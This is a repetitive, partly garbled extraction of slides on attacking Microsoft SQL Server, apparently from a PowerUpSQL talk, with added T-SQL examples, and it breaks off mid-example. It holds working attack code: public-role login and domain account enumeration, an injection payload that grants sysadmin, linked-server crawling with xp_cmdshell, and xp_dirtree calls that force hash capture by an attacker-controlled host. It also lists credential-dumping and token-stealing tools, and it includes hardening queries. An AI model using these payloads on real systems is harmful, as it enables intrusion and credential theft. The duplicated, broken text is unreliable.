3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges: Impersonation (SQL Injection Example)
CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%' + @DbName + '%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO
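What the injection in sp_sqli2 buys an attacker, and the fixed procedure beside it. This is an added example, not code from the deck or from PowerUpSQL; it assumes sp_sqli2 was created WITH EXECUTE AS OWNER (as on the preceding slide) by a sysadmin owner in a TRUSTWORTHY database, and MyAppUser is a placeholder low-privilege login that has EXECUTE on the procedure.

```sql
-- Added example (not from the original deck or PowerUpSQL). Assumes sp_sqli2 from the
-- slide runs WITH EXECUTE AS OWNER in a TRUSTWORTHY database whose owner is sysadmin.

-- As the low-privilege caller: @DbName is concatenated into the query, so a quote
-- closes the LIKE literal and the appended statement runs in the owner's context.
EXEC dbo.sp_sqli2
     @DbName = 'x'' ; EXEC master..sp_addsrvrolemember ''MyAppUser'',''sysadmin'' ; --';
-- The resulting dynamic SQL is:
--   SELECT name FROM master..sysdatabases WHERE name like '%x' ;
--   EXEC master..sp_addsrvrolemember 'MyAppUser','sysadmin' ; --%' OR name='tempdb'
SELECT IS_SRVROLEMEMBER('sysadmin', 'MyAppUser') AS is_sysadmin_now;   -- 1 if it worked

-- Hardened version: the user value is a parameter of sp_executesql, never part of the
-- statement text, and the procedure runs as the caller.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM sys.databases '
      + N'WHERE name LIKE N''%'' + @pattern + N''%'' OR name = N''tempdb'';';
    EXEC sys.sp_executesql @query, N'@pattern sysname', @pattern = @DbName;
END
GO
```

Two things changed in the fix: sysname bounds the input to 128 characters, and the pattern is bound as a parameter so a quote in it is just a quote. If a procedure genuinely has to run privileged work for low-privilege callers, sign it (previous slide) rather than declaring it WITH EXECUTE AS OWNER.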
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. Sysadmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Network diagram built up over four slides: Internet, DMZ (ports 80 and 443), Intranet (ports 1433 and 1434), with LVA and HVA database servers and ADS. Key: HVA = High Value Application, LVA = Low Value Application. Steps: (1) SQL injection against the LVA; (2) execute a local command via xp_cmdshell; (3) access the HVA with the shared domain service account, then execute commands and gather data from other database servers via osql.]
Escalating Privileges: Crawling Server Links
What's a database link?
• Database links (linked servers) are basically persistent database connections for SQL Servers
Why should I care?
• Short answer = privilege escalation
• The public role can use links to execute queries on remote servers; the query runs as whatever remote login the link was configured with, so the caller is effectively impersonating it
SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@Version')
• Stored procedures can be executed over the link (xp_cmdshell)
• Links can be crawled: a remote server's own links can be followed in turn
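The enumeration and crawl described above, done by hand from a low-privilege login. This is an added example, not code from the deck or from PowerUpSQL (which automates the same walk with Get-SQLServerLinkCrawl); SQLSERVER2 and SQLSERVER3 are placeholder link names.

```sql
-- Added example (not from the original deck or PowerUpSQL). SQLSERVER2 / SQLSERVER3
-- are placeholder linked-server names.

-- 1. Which links exist and what remote login each one maps to. A link mapped to a
--    fixed remote login (often sa) hands that login's remote privileges to every caller.
SELECT s.name                 AS link_name,
       s.data_source,
       s.is_rpc_out_enabled,                  -- needed for EXEC ... AT
       ll.local_principal_id,                 -- 0 = mapping applies to all local logins
       ll.uses_self_credential,               -- 1 = pass the caller's own credentials
       ll.remote_name                         -- fixed remote login, or NULL
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. Who are we on the far side? OPENQUERY needs only the link; public can use it.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. Crawl one hop further by nesting OPENQUERY. Each nesting level doubles the quotes.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT * FROM OPENQUERY([SQLSERVER3],
        ''SELECT name, data_source FROM sys.servers WHERE is_linked = 1'')');

-- 4. If the link maps to a remote sysadmin and RPC Out is enabled, statements run
--    remotely via EXEC ... AT, including enabling and calling xp_cmdshell.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
       EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQLSERVER2];
EXEC ('EXEC master..xp_cmdshell ''whoami''') AT [SQLSERVER2];
```

The fix is in the output of query 1: every link should map to a dedicated remote login with the minimum rights the application needs (never sa), and RPC Out should stay disabled unless a specific job requires it.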
[Figure: Leveraging MS SQL Database Links. Same network diagram (Internet, DMZ on ports 80 and 443, Intranet on ports 1433 and 1434, LVA and HVA servers, ADS), built up over five slides. DB1 (an LVA) has one DB link configured with least privileges and another DB link configured with the SA account. Key: HVA = High Value Application, LVA = Low Value Application. Steps: (1) SQL injection into the LVA; (2) execute SQL queries and local commands on the other database servers via nested linked servers.]
Escalating Privileges: Crawling Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of the environments we've seen
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker-controlled host
• An attacker can then capture the NetNTLM challenge/response and crack it offline or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Oh yeah...
• By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree and xp_fileexists
So in summary...
• The PUBLIC role can obtain the SQL Server service account's NetNTLM challenge/response by default
But who really has PUBLIC role access? Oh yeah, a ton of domain users
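The permission check, the trigger, and the revoke, as T-SQL. This is an added example, not code from the deck or from PowerUpSQL; 192.168.1.4 is the address from the slide, standing in for a host where you run a capture tool (Inveigh, Responder or similar, not shown here).

```sql
-- Added example (not from the original deck or PowerUpSQL). 192.168.1.4 stands in for
-- an attacker-controlled SMB listener.
USE master;
GO
-- 1. Confirm the default grant: which file-path procedures can public execute?
SELECT OBJECT_NAME(p.major_id) AS procedure_name, p.permission_name, p.state_desc
FROM sys.database_permissions AS p
WHERE p.grantee_principal_id = DATABASE_PRINCIPAL_ID('public')
  AND p.class = 1                                  -- object permissions
  AND OBJECT_NAME(p.major_id) IN ('xp_dirtree', 'xp_fileexists');

-- 2. Either call makes the service account authenticate outbound over SMB
--    to the host in the UNC path. No special privileges are needed.
EXEC master..xp_dirtree    '\\192.168.1.4\share', 1, 1;   -- depth 1, include files
EXEC master..xp_fileexists '\\192.168.1.4\share\file';

-- 3. Hardening: remove the grant to public. Sysadmins can still call both procedures,
--    and applications that legitimately need them can be granted EXECUTE individually.
REVOKE EXECUTE ON xp_dirtree    FROM public;
REVOKE EXECUTE ON xp_fileexists FROM public;
GO
```

Two caveats that decide what you get back: an instance running as a virtual or local account still authenticates, but as the machine account, which is only interesting for relay; and relay succeeds only against targets that do not require SMB signing. Cracking the captured challenge/response is what turns a shared domain service account into access to every instance that runs under it.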
Escalating Privileges: UNC Path Injection, DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self-descriptive
Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x

Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options

Approach                                                        Common Tools
Access as Local Administrator                                   Management Studio, sqlcmd, and other native SQL client tools
Access as LocalSystem                                           PsExec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets    Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process     Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from the SQL Server service process  Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                                DBATools
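Two checks that sit behind the Shared Service Accounts slide and the version table above: which account the engine runs as (and whether it is a domain account that may be shared), and which Windows principals currently hold sysadmin, which is where the version-dependent defaults (BUILTIN\Administrators through 2005, NT AUTHORITY\SYSTEM through 2008 R2, the service account's own login on every version) show up. This is an added example, not code from the deck or from PowerUpSQL; sys.dm_server_services needs SQL Server 2008 R2 SP1 or later and VIEW SERVER STATE.

```sql
-- Added example (not from the original deck or PowerUpSQL). Requires SQL Server
-- 2008 R2 SP1+ for sys.dm_server_services; xp_cmdshell in step 3 requires sysadmin.

-- 1. Which account runs the engine, classified for the shared-account question.
SELECT servicename, service_account,
       CASE
         WHEN service_account IN ('LocalSystem', 'NT AUTHORITY\SYSTEM')
           OR service_account LIKE 'NT SERVICE\%'
           OR service_account LIKE 'NT AUTHORITY\%'      THEN 'built-in or virtual account'
         WHEN service_account LIKE '.\%'
           OR service_account LIKE CAST(SERVERPROPERTY('MachineName') AS nvarchar(128)) + '\%'
                                                          THEN 'local user account'
         WHEN service_account LIKE '%\%'                  THEN 'domain account: check how many instances share it'
         ELSE 'unknown'
       END AS account_type
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';

-- 2. Windows logins and groups that are members of sysadmin. On 2000/2005 expect
--    BUILTIN\Administrators, through 2008 R2 expect NT AUTHORITY\SYSTEM, and on every
--    version expect the service account (or its NT SERVICE\ virtual account).
SELECT m.name, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
  AND m.type IN ('U', 'G')                 -- Windows login, Windows group
ORDER BY m.name;

-- 3. Confirm that OS commands run as the service account from step 1.
EXEC master..xp_cmdshell 'whoami';
```

If step 1 reports the same domain account on many instances and step 2 shows it as sysadmin on each, the One Account to Rule Them All scenario applies; group Managed Service Accounts or one account per instance remove that pivot without changing what the engine can do.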
Common Post Exploitation Activities
Post Exploitation Overview
1. Establish Persistence
• SQL Server layer: startup procedures, agent jobs, triggers, modified code
• OS layer: registry and file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted (TDE) databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
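Where to look for the SQL Server-layer persistence listed in item 1, as T-SQL run by a sysadmin or incident responder. This is an added example, not code from the deck or from PowerUpSQL; dbo.suspect_proc in the last step is a placeholder name, and sp_MSforeachdb is an undocumented but shipped procedure.

```sql
-- Added example (not from the original deck or PowerUpSQL). Run as sysadmin.
USE master;
GO
-- 1. Startup procedures: run as the service account every time the instance starts.
SELECT name, create_date, modify_date
FROM sys.procedures
WHERE OBJECTPROPERTY(object_id, 'ExecIsStartup') = 1;

-- 2. Agent jobs whose steps shell out, run PowerShell, or call xp_cmdshell.
SELECT j.name                   AS job_name,
       SUSER_SNAME(j.owner_sid) AS owner_login,
       j.enabled,
       s.step_name, s.subsystem,
       LEFT(s.command, 200)     AS command_preview,
       j.date_modified
FROM msdb.dbo.sysjobs      AS j
JOIN msdb.dbo.sysjobsteps  AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
   OR s.command LIKE '%xp_cmdshell%';

-- 3. Server-level triggers: logon triggers fire on every connection, DDL triggers on
--    every server-scope DDL event.
SELECT name, type_desc, is_disabled, create_date, modify_date
FROM sys.server_triggers;

-- 4. Non-Microsoft triggers in every database (sp_MSforeachdb is undocumented but shipped).
EXEC sp_MSforeachdb N'USE [?];
    SELECT DB_NAME() AS database_name, name, parent_class_desc, is_disabled, modify_date
    FROM sys.triggers WHERE is_ms_shipped = 0;';

-- 5. Response: turn off auto-start for a suspect procedure (placeholder name).
EXEC sp_procoption @ProcName = N'dbo.suspect_proc', @OptionName = 'startup', @OptionValue = 'off';
GO
```

The modify_date columns are what make these queries useful on a schedule: diff today's output against yesterday's and alert on anything new, since legitimate startup procedures and logon triggers change rarely.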
Escalating Privileges: Weak Passwords
Enumerating logins from the PUBLIC role:
2. Get the principal id for the sa login with SUSER_ID('sa')
3. Use SUSER_NAME(principal_id) to resolve SQL logins from just the principal id
4. Increment the number and repeat
select n [id], SUSER_NAME(n) [user_name]
from (
  select top 10000 row_number() over(order by t1.number) as N
  from master..spt_values t1 cross join master..spt_values t2
) a
where SUSER_NAME(n) is not null
Code gifted from @mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7
Enumerating domain accounts via SIDs:
3. Keep the first 48 hex characters (24 bytes) of the full SID; that is the domain SID, and the trailing 4 bytes are the RID (little-endian):
Full SID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
Domain SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0 (trailing 00020000 = RID 512, Domain Admins)
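Both enumerations above in one script: principal-id fuzzing with SUSER_NAME, then domain account discovery by resolving one known group with SUSER_SID, keeping the 24-byte domain SID, and appending candidate RIDs for SUSER_SNAME to resolve. This is an added example, not code from the deck or from PowerUpSQL (whose Get-SQLFuzzServerLogin and Get-SQLFuzzDomainAccount do the same from PowerShell); DOMAIN is a placeholder and the instance must be domain-joined. Everything here works from the public role.

```sql
-- Added example (not from the original deck or PowerUpSQL). DOMAIN is a placeholder.
-- Works from the public role: SUSER_NAME / SUSER_SID / SUSER_SNAME resolve names
-- without VIEW ANY DEFINITION.

-- 1. Server logins: SUSER_NAME(n) returns a name for every valid principal id.
SELECT n AS principal_id, SUSER_NAME(n) AS login_name
FROM (SELECT TOP (10000) ROW_NUMBER() OVER (ORDER BY t1.number) AS n
      FROM master..spt_values AS t1 CROSS JOIN master..spt_values AS t2) AS ids
WHERE SUSER_NAME(n) IS NOT NULL;

-- 2. Domain accounts. Resolve one group everyone knows exists, keep the domain part
--    of its SID, then append RIDs as little-endian 4-byte integers.
--    Slide value: 0x0105000000000005150000009CC30DD479441EDEB31027D0 | 00020000
--                 <------------- 24-byte domain SID ---------------> | RID 512
DECLARE @group_sid  varbinary(85) = SUSER_SID('DOMAIN\Domain Admins');
DECLARE @domain_sid varbinary(24) = SUBSTRING(@group_sid, 1, 24);

SELECT rid,
       SUSER_SNAME(@domain_sid + CONVERT(binary(4), REVERSE(CONVERT(binary(4), CONVERT(int, rid)))))
           AS account_name
FROM (SELECT TOP (2000) 499 + ROW_NUMBER() OVER (ORDER BY t1.number) AS rid   -- 500 .. 2499
      FROM master..spt_values AS t1 CROSS JOIN master..spt_values AS t2) AS rids
WHERE SUSER_SNAME(@domain_sid + CONVERT(binary(4), REVERSE(CONVERT(binary(4), CONVERT(int, rid)))))
      IS NOT NULL;
```

CONVERT(binary(4), int) produces the RID big-endian, so REVERSE flips it to the little-endian order a SID uses; for RID 512 that is 00 02 00 00, matching the slide. Each SUSER_SNAME call is a lookup against a domain controller made by the SQL Server service account, so keep the RID window modest and expect the traffic to be visible in DC logs.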
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges: Weak Passwords
Blind SQL login enumeration (continued):
2. Get the principal ID of the sa account with SUSER_ID.
3. Use SUSER_NAME to resolve SQL logins from nothing but a principal ID.
4. Increment the number and repeat.

    SELECT n [id], SUSER_NAME(n) [user_name]
    FROM (SELECT TOP 10000 ROW_NUMBER() OVER (ORDER BY t1.number) AS n
          FROM master..spt_values t1 CROSS JOIN master..spt_values t2) a
    WHERE SUSER_NAME(n) IS NOT NULL

Code gifted from @mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7

Blind domain account enumeration (continued):
3. Grab the first 48 hex characters (24 bytes) of the full SID; that prefix is the domain SID. The trailing 4 bytes are the RID, stored little-endian (0x00020000 = 512, the Domain Admins group).
    Full SID   = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
    Domain SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
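The domain-account step above worked through end to end, as an added T-SQL example that is not part of the original deck. It assumes only that the instance is domain joined and that the public-role login can call SUSER_SID and SUSER_SNAME (both are granted to public); the RID range 500 to 1500 and the use of Domain Admins as the anchor principal are choices made for the example.

```sql
-- Added example (not from the deck): blind domain account enumeration from the
-- public role. Rebuild SIDs from the domain SID prefix plus a candidate RID and
-- let the OS resolve them with SUSER_SNAME(). Nothing here needs a domain account.
DECLARE @Domain    sysname;
DECLARE @AnchorSid varbinary(85);
DECLARE @DomainSid varbinary(24);
DECLARE @RidLE     binary(4);
DECLARE @Rid       int = 500;      -- RID 500 is the built-in Administrator account
DECLARE @LastRid   int = 1500;     -- widen this to reach user-created accounts and groups
DECLARE @Name      sysname;
DECLARE @Found     TABLE (rid int, account_name sysname);

-- Step 1: the domain the SQL Server belongs to.
SET @Domain = DEFAULT_DOMAIN();

-- Step 2: SUSER_SID() resolves a domain principal through the OS even when it has no SQL login.
--         Domain Admins (RID 512) exists in every domain, so it is a safe anchor.
SET @AnchorSid = SUSER_SID(@Domain + N'\Domain Admins');

-- Step 3: the first 24 bytes are the domain SID; the last 4 bytes are the RID.
SET @DomainSid = CONVERT(varbinary(24), SUBSTRING(@AnchorSid, 1, 24));

-- Steps 4 and 5: append each candidate RID as a little-endian DWORD and ask who that is.
-- CONVERT(binary(1), int) keeps the low byte, which is what we want for each position.
WHILE @Rid <= @LastRid
BEGIN
    SET @RidLE = CONVERT(binary(1), @Rid & 255)
               + CONVERT(binary(1), (@Rid / 256) & 255)
               + CONVERT(binary(1), (@Rid / 65536) & 255)
               + CONVERT(binary(1), (@Rid / 16777216) & 255);

    SET @Name = SUSER_SNAME(@DomainSid + @RidLE);   -- NULL when no principal has that RID
    IF @Name IS NOT NULL
        INSERT INTO @Found (rid, account_name) VALUES (@Rid, @Name);

    SET @Rid += 1;
END

SELECT rid, account_name FROM @Found ORDER BY rid;
```

Every SUSER_SNAME call is a SID-to-name lookup made by the SQL Server service against a domain controller, so a wide RID range is noisy on the DC side; that is also what a defender should watch for, since the same traffic from a SQL Server process is otherwise rare.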
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login.
• The db_owner role can impersonate the actual database owner.
Pros:
• Can execute queries/commands in another user's context
• Limits the commands and queries exposed
• Don't have to grant IMPERSONATE
Cons:
• No granular control over the database owner's privileges
• db_owner role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY for OS command execution (the same holds for any other server-level action, such as the sp_addsrvrolemember call below)
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions

Example: a db_owner creating a procedure that runs as the (sysadmin) owner and adds their own login to the sysadmin role:

    USE MyAppDb
    GO
    CREATE PROCEDURE sp_escalate_me
    WITH EXECUTE AS OWNER
    AS
    EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
    GO

SYSADMIN is often the OWNER.
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures instead:
  o Create the stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure the login's privileges
  o Sign the stored procedure with the certificate
  o GRANT EXECUTE to the user
Pros:
• Can execute queries/commands in another user's context
• Limits the commands and queries exposed
• Don't have to grant IMPERSONATE
• Granular control over permissions
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution
Cons:
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
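The seven signed-procedure steps above carried through end to end, as an added example that is not the deck's own code. Assumed names: database MyAppDb, low-privileged user MyAppUser (mapped to a login of the same name), export path C:\Temp, and VIEW ANY DATABASE as the one server-level permission the procedure needs; the passphrases are placeholders.

```sql
-- Added example (not from the deck): server-level rights for a single procedure
-- through a certificate signature, with TRUSTWORTHY left OFF.
USE master;
GO
-- Steps 3, 4 and 5 (server side): certificate in master, a login derived from it, and
-- only the permission the procedure needs. Nothing here is sysadmin.
CREATE CERTIFICATE ListDbCert
    ENCRYPTION BY PASSWORD = 'CertKey-Change-Me-1!'
    WITH SUBJECT = 'Signs MyAppDb.dbo.usp_ListDatabases';
CREATE LOGIN ListDbCertLogin FROM CERTIFICATE ListDbCert;
GRANT VIEW ANY DATABASE TO ListDbCertLogin;

-- Carry the certificate and its private key into the application database.
-- Delete both files once the import below has succeeded.
BACKUP CERTIFICATE ListDbCert TO FILE = 'C:\Temp\ListDbCert.cer'
    WITH PRIVATE KEY (FILE = 'C:\Temp\ListDbCert.pvk',
                      ENCRYPTION BY PASSWORD = 'PvkFile-Change-Me-1!',
                      DECRYPTION BY PASSWORD = 'CertKey-Change-Me-1!');
GO
USE MyAppDb;
GO
-- Step 1: the procedure. Static SQL only, so there is nothing to inject into.
CREATE PROCEDURE dbo.usp_ListDatabases
AS
BEGIN
    SET NOCOUNT ON;
    SELECT name FROM master.sys.databases;
END
GO
-- Step 2: database master key; it protects the imported private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'DbMasterKey-Change-Me-1!';
-- Step 3 (database side): the same certificate, so the thumbprint matches master.
CREATE CERTIFICATE ListDbCert
    FROM FILE = 'C:\Temp\ListDbCert.cer'
    WITH PRIVATE KEY (FILE = 'C:\Temp\ListDbCert.pvk',
                      DECRYPTION BY PASSWORD = 'PvkFile-Change-Me-1!');
-- Step 6: sign. Any later ALTER PROCEDURE drops the signature silently, so re-sign after changes.
ADD SIGNATURE TO dbo.usp_ListDatabases BY CERTIFICATE ListDbCert;
-- Step 7: hand out EXECUTE only.
GRANT EXECUTE ON dbo.usp_ListDatabases TO MyAppUser;
GO
-- Check: the signature is recorded and the database is still not trustworthy.
SELECT OBJECT_NAME(cp.major_id) AS procedure_name,
       c.name AS certificate_name,
       (SELECT is_trustworthy_on FROM sys.databases WHERE name = DB_NAME()) AS is_trustworthy_on
FROM sys.crypt_properties cp
JOIN sys.certificates c ON c.thumbprint = cp.thumbprint;
```

When MyAppUser executes the procedure, the statement runs with the caller's permissions plus those of ListDbCertLogin, and nothing else; a db_owner cannot widen that by editing the procedure, because the edit removes the signature and with it the extra permission.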
Escalating Privileges: Impersonation
SQL Injection Example

    CREATE PROCEDURE sp_sqli2
    @DbName varchar(max)
    AS
    BEGIN
    DECLARE @query AS varchar(max)
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name LIKE ''%' + @DbName + '%'' OR name=''tempdb'''
    EXECUTE(@query)
    END
    GO
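The injectable procedure above turned into a privilege escalation, then fixed, as an added example that is not the deck's own code. The WITH EXECUTE AS OWNER clause is added here to show the impersonation case the slide is about; the assumed setting is a database MyAppDb owned by a sysadmin with TRUSTWORTHY ON, and a user MyAppUser mapped to a login of the same name with nothing but EXECUTE on the procedure.

```sql
-- Added example (not from the deck): SQL injection inside an EXECUTE AS OWNER
-- procedure, the payload, and a hardened rewrite.
USE MyAppDb;
GO
-- Vulnerable: caller-controlled text is concatenated into dynamic SQL that runs as the owner.
CREATE PROCEDURE dbo.sp_sqli2
    @DbName varchar(max)
WITH EXECUTE AS OWNER
AS
BEGIN
    DECLARE @query varchar(max);
    SET @query = 'SELECT name FROM master..sysdatabases WHERE name LIKE ''%' + @DbName + '%'' OR name=''tempdb''';
    EXECUTE(@query);
END
GO
GRANT EXECUTE ON dbo.sp_sqli2 TO MyAppUser;
GO

-- Attack, run as MyAppUser: close the LIKE literal, append a statement, comment out the tail.
-- The appended statement executes as the database owner, i.e. as a sysadmin.
EXEC dbo.sp_sqli2 @DbName = 'x%''; EXEC master..sp_addsrvrolemember ''MyAppUser'',''sysadmin''; --';
SELECT IS_SRVROLEMEMBER('sysadmin', 'MyAppUser') AS now_sysadmin;   -- 1 once the call above has run

-- Hardened: the search term is bound as a parameter, so it can only ever be a value;
-- no EXECUTE AS, because reading sys.databases needs no elevated context.
CREATE PROCEDURE dbo.sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master.sys.databases WHERE name LIKE ''%'' + @pattern + ''%'' OR name = N''tempdb''';
    EXEC sys.sp_executesql @query, N'@pattern sysname', @pattern = @DbName;
END
GO
```

The two changes are independent and both matter: parameterising the dynamic SQL removes the injection, and dropping EXECUTE AS OWNER removes the reason any injection that did slip through would land as a sysadmin. A value containing LIKE wildcards still widens the match in the fixed version, but it can no longer change the statement.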
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. Sysadmins can execute OS commands.
2. OS commands run as the SQL Server service account.
3. Service accounts have sysadmin privileges by default.
4. Companies often use a single domain account to run hundreds of SQL Servers.
5. So if you get sysadmin on one server, you have it on all of them.
One account to rule them all.
[Diagram: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet, DMZ, Intranet (ADS). Web tier reachable on ports 80 and 443; SQL Server on ports 1433 and 1434. Key: HVA = High Value Application, LVA = Low Value Application. The attacker (Captain Evil) proceeds in three steps: 1. SQL injection against the LVA; 2. Execute a local command via xp_cmdshell; 3. Access the HVA with the shared domain service account, executing commands and gathering data from other database servers via osql.]
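Steps 2 and 3 of the diagram from the SQL side, plus the query a defender uses to find instances that share an account, as an added example that is not the deck's own code. Assumed names: a second instance SQLSRV02 and a service account DOMAIN\svc_sql; sqlcmd stands in for the osql named on the slide.

```sql
-- Added example (not from the deck): lateral movement on a shared SQL Server service account.

-- Which account will OS commands run as? (sys.dm_server_services: SQL Server 2008 R2 SP1 and later)
-- Run this on every instance and group by service_account to find the shared ones.
SELECT servicename, service_account FROM sys.dm_server_services;

-- Step 2: as sysadmin, turn on xp_cmdshell and confirm the execution context.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';                       -- DOMAIN\svc_sql

-- Step 3: the OS process holds the service account's Windows credential, so a trusted
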